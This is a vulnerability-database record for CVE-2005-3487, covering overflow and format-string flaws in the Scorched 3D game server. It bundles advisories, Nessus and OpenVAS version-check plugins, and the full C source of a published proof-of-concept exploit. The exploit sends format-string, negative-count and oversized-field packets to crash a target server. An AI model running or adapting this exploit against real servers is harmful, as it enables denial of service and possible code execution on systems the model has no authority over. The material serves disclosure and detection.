ID CVE-2005-3487 Type cve Reporter cve@mitre.org Modified 2016-10-18T03:35:00
Description
Multiple buffer overflows in Scorched 3D 39.1 (bf) and earlier allow remote attackers to execute arbitrary code via various (1) GLConsole::addLine, (2) ServerCommon::sendString, (3) ServerCommon::serverLog functions, (4) a long command that is not properly handled in ComsMessageHandler.cpp when generating an error message, (5) a long UniqueID value in Logger.cpp, and possibly other unspecified vectors.
{"osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Scorched 3D. The Logger.cpp component fails to validate very long values resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Scorched 3D. The Logger.cpp component fails to validate very long values resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.scorched3d.co.uk\n[Secunia Advisory ID:17549](https://secuniaresearch.flexerasoftware.com/advisories/17549/)\n[Secunia Advisory ID:17423](https://secuniaresearch.flexerasoftware.com/advisories/17423/)\n[Related OSVDB ID: 20466](https://vulners.com/osvdb/OSVDB:20466)\n[Related OSVDB ID: 20468](https://vulners.com/osvdb/OSVDB:20468)\n[Related OSVDB ID: 20467](https://vulners.com/osvdb/OSVDB:20467)\n[Related OSVDB ID: 20465](https://vulners.com/osvdb/OSVDB:20465)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-12.xml\nOther Advisory URL: http://aluigi.altervista.org/adv/scorchbugs-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0070.html\nFrSIRT Advisory: ADV-2005-2288\n[CVE-2005-3487](https://vulners.com/cve/CVE-2005-3487)\nBugtraq ID: 15292\n", "modified": "2005-11-02T04:46:16", "published": "2005-11-02T04:46:16", "href": "https://vulners.com/osvdb/OSVDB:20469", "id": "OSVDB:20469", "type": "osvdb", "title": "Scorched 3D Logger.cpp Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in Scorched 3D. The ComsMessageHandler.cpp component fails to validate command names resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in Scorched 3D. The ComsMessageHandler.cpp component fails to validate command names resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.scorched3d.co.uk\n[Secunia Advisory ID:17549](https://secuniaresearch.flexerasoftware.com/advisories/17549/)\n[Secunia Advisory ID:17423](https://secuniaresearch.flexerasoftware.com/advisories/17423/)\n[Related OSVDB ID: 20466](https://vulners.com/osvdb/OSVDB:20466)\n[Related OSVDB ID: 20467](https://vulners.com/osvdb/OSVDB:20467)\n[Related OSVDB ID: 20465](https://vulners.com/osvdb/OSVDB:20465)\n[Related OSVDB ID: 20469](https://vulners.com/osvdb/OSVDB:20469)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-12.xml\nOther Advisory URL: http://aluigi.altervista.org/adv/scorchbugs-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0070.html\nFrSIRT Advisory: ADV-2005-2288\n[CVE-2005-3487](https://vulners.com/cve/CVE-2005-3487)\nBugtraq ID: 15292\n", "modified": "2005-11-02T04:46:16", "published": "2005-11-02T04:46:16", "href": "https://vulners.com/osvdb/OSVDB:20468", "id": "OSVDB:20468", "type": "osvdb", "title": "Scorched 3D ComsMessageHandler.cpp Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T02:40:14", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200511-12\n(Scorched 3D: Multiple vulnerabilities)\n\n Luigi Auriemma discovered multiple flaws in the Scorched 3D game\n server, including a format string vulnerability and several buffer\n overflows.\n \nImpact :\n\n A remote attacker can exploit these vulnerabilities to crash a game\n server or execute arbitrary code with the rights of the game server\n user. Users not running a Scorched 3D game server are not affected by\n these flaws.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-200511-12.NASL", "href": "https://www.tenable.com/plugins/nessus/20233", "published": "2005-11-21T00:00:00", "title": "GLSA-200511-12 : Scorched 3D: Multiple vulnerabilities", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-12.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20233);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:43\");\n\n script_cve_id(\"CVE-2005-3486\", \"CVE-2005-3487\", \"CVE-2005-3488\");\n script_xref(name:\"GLSA\", value:\"200511-12\");\n\n script_name(english:\"GLSA-200511-12 : Scorched 3D: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-12\n(Scorched 3D: Multiple vulnerabilities)\n\n Luigi Auriemma discovered multiple flaws in the Scorched 3D game\n server, including a format string vulnerability and several buffer\n overflows.\n \nImpact :\n\n A remote attacker can exploit these vulnerabilities to crash a game\n server or execute arbitrary code with the rights of the game server\n user. Users not running a Scorched 3D game server are not affected by\n these flaws.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Scorched 3D users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=games-strategy/scorched3d-40'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:scorched3d\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"games-strategy/scorched3d\", unaffected:make_list(\"ge 40\"), vulnerable:make_list(\"le 39.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Scorched 3D\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:05", "bulletinFamily": "unix", "description": "### Background\n\nScorched 3D is a clone of the classic \"Scorched Earth\" DOS game, adding features like a 3D island environment and Internet multiplayer capabilities. \n\n### Description\n\nLuigi Auriemma discovered multiple flaws in the Scorched 3D game server, including a format string vulnerability and several buffer overflows. \n\n### Impact\n\nA remote attacker can exploit these vulnerabilities to crash a game server or execute arbitrary code with the rights of the game server user. Users not running a Scorched 3D game server are not affected by these flaws. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Scorched 3D users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=games-strategy/scorched3d-40\"", "modified": "2006-08-10T00:00:00", "published": "2005-11-15T00:00:00", "id": "GLSA-200511-12", "href": "https://security.gentoo.org/glsa/200511-12", "type": "gentoo", "title": "Scorched 3D: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-12.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=55878", "id": "OPENVAS:55878", "title": "Gentoo Security Advisory GLSA 200511-12 (scorched3d)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Scorched 3D allow a remote attacker to deny\nservice or execute arbitrary code on game servers.\";\ntag_solution = \"The Scorched 3D package has been hard-masked until a new version correcting\nthese flaws is released. In the meantime, current users are advised to\nunmerge the package:\n\n # emerge --unmerge games-strategy/scorched3d\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-12\nhttp://bugs.gentoo.org/show_bug.cgi?id=111421\nhttp://seclists.org/lists/fulldisclosure/2005/Nov/0079.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-12.\";\n\n \n\nif(description)\n{\n script_id(55878);\n script_cve_id(\"CVE-2005-3486\",\"CVE-2005-3487\",\"CVE-2005-3488\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200511-12 (scorched3d)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"games-strategy/scorched3d\", unaffected: make_list(), vulnerable: make_list(\"le 39.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:56:17", "bulletinFamily": "exploit", "description": "Scorched 3D <= 39.1 Multiple Vulnerabilities (All-in-One) (PoC). CVE-2005-3486,CVE-2005-3487,CVE-2005-3488. Dos exploit for windows platform", "modified": "2005-11-02T00:00:00", "published": "2005-11-02T00:00:00", "id": "EDB-ID:1285", "href": "https://www.exploit-db.com/exploits/1285/", "type": "exploitdb", "title": "Scorched 3D <= 39.1 - Multiple Vulnerabilities All-in-One PoC", "sourceData": "/*\n\nby Luigi Auriemma\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdarg.h>\n#include <time.h>\n#include <zlib.h>\n\n#ifdef WIN32\n #include <winsock.h>\n/*\n Header file used for manage errors in Windows\n It support socket and errno too\n (this header replace the previous sock_errX.h)\n*/\n\n#include <string.h>\n#include <errno.h>\n\n\n\nvoid std_err(void) {\n char *error;\n\n switch(WSAGetLastError()) {\n case 10004: error = \"Interrupted system call\"; break;\n case 10009: error = \"Bad file number\"; break;\n case 10013: error = \"Permission denied\"; break;\n case 10014: error = \"Bad address\"; break;\n case 10022: error = \"Invalid argument (not bind)\"; break;\n case 10024: error = \"Too many open files\"; break;\n case 10035: error = \"Operation would block\"; break;\n case 10036: error = \"Operation now in progress\"; break;\n case 10037: error = \"Operation already in progress\"; break;\n case 10038: error = \"Socket operation on non-socket\"; break;\n case 10039: error = \"Destination address required\"; break;\n case 10040: error = \"Message too long\"; break;\n case 10041: error = \"Protocol wrong type for socket\"; break;\n case 10042: error = \"Bad protocol option\"; break;\n case 10043: error = \"Protocol not supported\"; break;\n case 10044: error = \"Socket type not supported\"; break;\n case 10045: error = \"Operation not supported on socket\"; break;\n case 10046: error = \"Protocol family not supported\"; break;\n case 10047: error = \"Address family not supported by protocol family\"; break;\n case 10048: error = \"Address already in use\"; break;\n case 10049: error = \"Can't assign requested address\"; break;\n case 10050: error = \"Network is down\"; break;\n case 10051: error = \"Network is unreachable\"; break;\n case 10052: error = \"Net dropped connection or reset\"; break;\n case 10053: error = \"Software caused connection abort\"; break;\n case 10054: error = \"Connection reset by peer\"; break;\n case 10055: error = \"No buffer space available\"; break;\n case 10056: error = \"Socket is already connected\"; break;\n case 10057: error = \"Socket is not connected\"; break;\n case 10058: error = \"Can't send after socket shutdown\"; break;\n case 10059: error = \"Too many references, can't splice\"; break;\n case 10060: error = \"Connection timed out\"; break;\n case 10061: error = \"Connection refused\"; break;\n case 10062: error = \"Too many levels of symbolic links\"; break;\n case 10063: error = \"File name too long\"; break;\n case 10064: error = \"Host is down\"; break;\n case 10065: error = \"No Route to Host\"; break;\n case 10066: error = \"Directory not empty\"; break;\n case 10067: error = \"Too many processes\"; break;\n case 10068: error = \"Too many users\"; break;\n case 10069: error = \"Disc Quota Exceeded\"; break;\n case 10070: error = \"Stale NFS file handle\"; break;\n case 10091: error = \"Network SubSystem is unavailable\"; break;\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n case 10071: error = \"Too many levels of remote in path\"; break;\n case 11001: error = \"Host not found\"; break;\n case 11002: error = \"Non-Authoritative Host not found\"; break;\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n case 11004: error = \"Valid name, no data record of requested type\"; break;\n default: error = strerror(errno); break;\n }\n fprintf(stderr, \"\\nError: %s\\n\", error);\n exit(1);\n}\n\n// inserted winerr.h /str0ke\n\n #define close closesocket\n #define ONESEC 1000\n#else\n #include <unistd.h>\n #include <sys/socket.h>\n #include <sys/types.h>\n #include <arpa/inet.h>\n #include <netinet/in.h>\n #include <netdb.h>\n\n #define ONESEC 1\n#endif\n\n\n\n#define VER \"0.1\"\n#define PORT 27270\n#define BUFFSZ 0xffff\n#define TIMEOUT 5\n#define WAITSEC 5\n#define MAXSOCKS 32\n#define INFO \"status\\0\"\n#define VERTAG \"build \"\n#define BOOMSZ 80000\n#define BOFSZ 2200 // 1024 buffer, we need more for Win compatibility\n\n\n\nu_char *do_it_big(int size);\nvoid scorched3d_info(u_char *data, u_char *version, u_char *pversion);\nvoid read_sock(int sock, u_char *buff, int max);\nint scorched3d_recv(int sd, u_char *pck, int pcksz, u_char *buff, int buffsz);\nvoid scorched3d_send(int sock, u_char *pck, int len, u_char *buff, int buffsz);\nint scorched3d_build_pck(u_char *buff, u_char *cmd, ...);\nint mycpy(u_char *dst, u_char *src);\nint unzip(u_char *in, int size, u_char *out, int maxsz);\nint zip(u_char *in, int size, u_char *out, int maxsz);\nint timeout(int sock);\nu_int resolv(char *host);\nvoid std_err(void);\n\n\n\nint main(int argc, char *argv[]) {\n struct sockaddr_in peer;\n int sd,\n len,\n attack;\n u_short port = PORT;\n u_char numplayers[12],\n password[256],\n version[16],\n pversion[16],\n username[17],\n *connmsg = \"ComsConnectMessage\",\n *uid,\n *buff,\n *pck,\n *msg,\n *p,\n *l;\n\n#ifdef WIN32\n WSADATA wsadata;\n WSAStartup(MAKEWORD(1,0), &wsadata);\n#endif\n\n\n setbuf(stdout, NULL);\n\n fputs(\"\\n\"\n \"Scorched 3D <= 39.1 (bf) multiple vulnerabilities \"VER\"\\n\"\n \"by Luigi Auriemma\\n\"\n \"e-mail: aluigi@autistici.org\\n\"\n \"web: http://aluigi.altervista.org\\n\"\n \"\\n\", stdout);\n\n if(argc < 3) {\n printf(\"\\n\"\n \"Usage: %s <attack> <host> [port(%hu)]\\n\"\n \"\\n\"\n \"Attacks:\\n\"\n \"1 = format string and buffer-overflow in addLine and SendString*\\n\"\n \" (this PoC tests only the format string for simplicity\\n\"\n \"2 = server freeze through negative numplayers\\n\"\n \" if server is protected with password you need to know the keyword\\n\"\n \"3 = ComsMessageHandler buffer-overflow\\n\"\n \"4 = various crashes and possible code execution in Logger.cpp\\n\"\n \" if server is protected with password you need to know the keyword\\n\"\n \"\\n\", argv[0], port);\n exit(1);\n }\n\n attack = atoi(argv[1]);\n if(argc > 3) port = atoi(argv[3]);\n\n peer.sin_addr.s_addr = resolv(argv[2]);\n peer.sin_port = htons(port + 1);\n peer.sin_family = AF_INET;\n\n printf(\"- target %s : %hu\\n\",\n inet_ntoa(peer.sin_addr), port);\n\n buff = malloc(BUFFSZ + 1);\n pck = malloc(BUFFSZ + 1);\n if(!buff || !pck) std_err();\n\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd < 0) std_err();\n sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));\n if(!timeout(sd)) {\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\n if(len < 0) std_err();\n buff[len] = 0;\n scorched3d_info(buff, version, pversion);\n printf(\"- set version %s (%s)\\n\", version, pversion);\n } else {\n strcpy(version, \"39.1\");\n strcpy(pversion, \"bf\");\n }\n close(sd);\n\n fputs(\n \"- if you lost the connection probably the server is vulnerable\\n\"\n \"- start attack:\\n\", stdout);\n\n uid = \"\";\n strcpy(numplayers, \"1\");\n password[0] = 0;\n\n switch(attack) {\n case 1: connmsg = \"%n%n%n%n%n\"; break;\n case 2: strcpy(numplayers, \"-1\"); break;\n case 3: connmsg = do_it_big(BOFSZ); break;\n case 4: uid = do_it_big(BOOMSZ); break;\n default: {\n printf(\"\\nError: the attack %d is not available\\n\\n\", attack);\n exit(1);\n } break;\n }\n\n peer.sin_port = htons(port);\n for(;;) { // password handling\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n if(sd < 0) std_err();\n if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))\n < 0) std_err();\n\n sprintf(username, \"%lx\", time(NULL));\n\n len = scorched3d_build_pck(pck,\n connmsg,\n \"host\", \"Linux\",\n \"numplayers\", numplayers,\n \"password\", password,\n \"pversion\", pversion,\n \"uid\", uid,\n \"username\", username,\n \"version\", version,\n NULL);\n\n scorched3d_send(sd, pck, len, buff, BUFFSZ);\n\n if(timeout(sd) < 0) {\n fputs(\"\\nError: socket timeout, the server has not replied to our request\\n\", stdout);\n exit(1);\n }\n\n len = scorched3d_recv(sd, pck, BUFFSZ, buff, BUFFSZ);\n\n if(!strcmp(buff, \"ComsTextMessage\")) {\n msg = buff + 16;\n\n if(strstr(msg, \"password\")) {\n fputs(\"- server protected, insert the right password:\\n \", stdout);\n fflush(stdin);\n fgets(password, sizeof(password), stdin);\n for(p = password; *p > '\\r'; p++);\n *p = 0;\n close(sd);\n continue;\n\n } else if(strstr(msg, \"version\")) {\n p = strstr(msg, VERTAG);\n if(!p) {\n printf(\"\\nError: no version found in the message:\\n%s\\n\", msg);\n exit(1);\n }\n p += sizeof(VERTAG) - 1;\n\n l = strchr(p, '(');\n if(l) *(l - 1) = 0;\n strcpy(version, p);\n\n p = l + 1;\n l = strchr(p, ')');\n if(l) *l = 0;\n strcpy(pversion, p);\n\n printf(\"- set version %s (%s)\\n\", version, pversion);\n close(sd);\n continue;\n }\n\n printf(\"%s\\n\", buff + 16);\n exit(1);\n }\n\n close(sd);\n break;\n }\n return(0);\n}\n\n\n\nu_char *do_it_big(int size) {\n u_char *s;\n\n s = malloc(size + 1);\n if(!s) std_err();\n memset(s, 'a', size);\n s[size] = 0;\n return(s);\n}\n\n\n\nvoid scorched3d_info(u_char *data, u_char *version, u_char *pversion) {\n u_char *p,\n *par,\n *val;\n\n version[0] = 0;\n pversion[0] = 0;\n\n p = strchr(data, ' ');\n if(!p) return;\n\n for(;;) {\n data = p + 1;\n if((*data == '/') || (*data == '>')) break;\n\n p = strchr(data, '=');\n if(!p) break;\n *p = 0;\n par = data;\n data = p + 1;\n if(*data == '\\'') {\n data++;\n p = strchr(data, '\\'');\n if(p) *p = 0;\n }\n p = strchr(p + 1, ' ');\n if(p) *p = 0;\n val = data;\n\n printf(\"%20s: %s\\n\", par, val);\n\n // strcpy usage, not sanitized\n if(!strcmp(par, \"version\")) {\n strcpy(version, val);\n } else if(!strcmp(par, \"protocolversion\")) {\n strcpy(pversion, val);\n }\n }\n}\n\n\n\nvoid read_sock(int sd, u_char *buff, int max) {\n int t;\n\n while(max) {\n t = recv(sd, buff, max, 0);\n if(t <= 0) std_err();\n max -= t;\n }\n}\n\n\n\nint scorched3d_recv(int sd, u_char *pck, int pcksz, u_char *buff, int buffsz) {\n int len,\n unzlen;\n\n read_sock(sd, (u_char *)&len, 4);\n len = ntohl(len);\n\n read_sock(sd, (u_char *)&unzlen, 4);\n unzlen = ntohl(unzlen);\n\n read_sock(sd, pck, len - 4);\n\n if(unzlen > buffsz) return(0);\n len = unzip(pck, pcksz, buff, unzlen);\n return(len);\n}\n\n\n\nvoid scorched3d_send(int sd, u_char *pck, int len, u_char *buff, int buffsz) {\n int tmp,\n zlen;\n\n zlen = zip(pck, len, buff, buffsz);\n\n tmp = htonl(zlen + 4);\n if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();\n\n tmp = htonl(len);\n if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();\n\n if(send(sd, buff, zlen, 0) < 0) std_err();\n}\n\n\n\nint scorched3d_build_pck(u_char *buff, u_char *cmd, ...) {\n va_list ap;\n int num = 0,\n *pnum;\n u_char *p,\n *s;\n\n p = buff;\n p += mycpy(p, cmd);\n pnum = (int *)p;\n p += 4;\n\n va_start(ap, cmd);\n while((s = va_arg(ap, u_char *))) {\n p += mycpy(p, s);\n num++;\n }\n va_end(ap);\n\n *pnum = htonl(num >> 1);\n return(p - buff);\n}\n\n\n\nint mycpy(u_char *dst, u_char *src) {\n u_char *base = dst;\n\n while(*src) *dst++ = *src++;\n *dst++ = 0;\n return(dst - base);\n}\n\n\n\nint unzip(u_char *in, int size, u_char *out, int maxsz) {\n z_stream z;\n int ret;\n\n z.zalloc = (alloc_func)0;\n z.zfree = (free_func)0;\n z.opaque = (voidpf)0;\n\n if(inflateInit2(&z, 15)) {\n fputs(\"\\nError: zlib initialization error\\n\", stdout);\n exit(1);\n }\n\n z.next_in = in;\n z.avail_in = size;\n z.next_out = out;\n z.avail_out = maxsz;\n inflate(&z, Z_NO_FLUSH);\n\n ret = z.total_out;\n inflateEnd(&z);\n return(ret);\n}\n\n\n\nint zip(u_char *in, int size, u_char *out, int maxsz) {\n z_stream z;\n int ret;\n\n z.zalloc = (alloc_func)0;\n z.zfree = (free_func)0;\n z.opaque = (voidpf)0;\n\n if(deflateInit2(&z, Z_BEST_COMPRESSION, Z_DEFLATED, 15, 9, Z_DEFAULT_STRATEGY)) {\n fputs(\"\\nError: zlib initialization error\\n\", stdout);\n exit(1);\n }\n\n z.next_in = in;\n z.avail_in = size;\n z.next_out = out;\n z.avail_out = maxsz;\n deflate(&z, Z_FINISH);\n\n ret = z.total_out;\n deflateEnd(&z);\n return(ret);\n}\n\n\n\nint timeout(int sock) {\n struct timeval tout;\n fd_set fd_read;\n int err;\n\n tout.tv_sec = TIMEOUT;\n tout.tv_usec = 0;\n FD_ZERO(&fd_read);\n FD_SET(sock, &fd_read);\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\n if(err < 0) std_err();\n if(!err) return(-1);\n return(0);\n}\n\n\n\nu_int resolv(char *host) {\n struct hostent *hp;\n u_int host_ip;\n\n host_ip = inet_addr(host);\n if(host_ip == INADDR_NONE) {\n hp = gethostbyname(host);\n if(!hp) {\n printf(\"\\nError: Unable to resolve hostname (%s)\\n\", host);\n exit(1);\n } else host_ip = *(u_int *)(hp->h_addr);\n }\n return(host_ip);\n}\n\n\n\n#ifndef WIN32\n void std_err(void) {\n perror(\"\\nError\");\n exit(1);\n }\n#endif\n\n// milw0rm.com [2005-11-02]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1285/"}]}
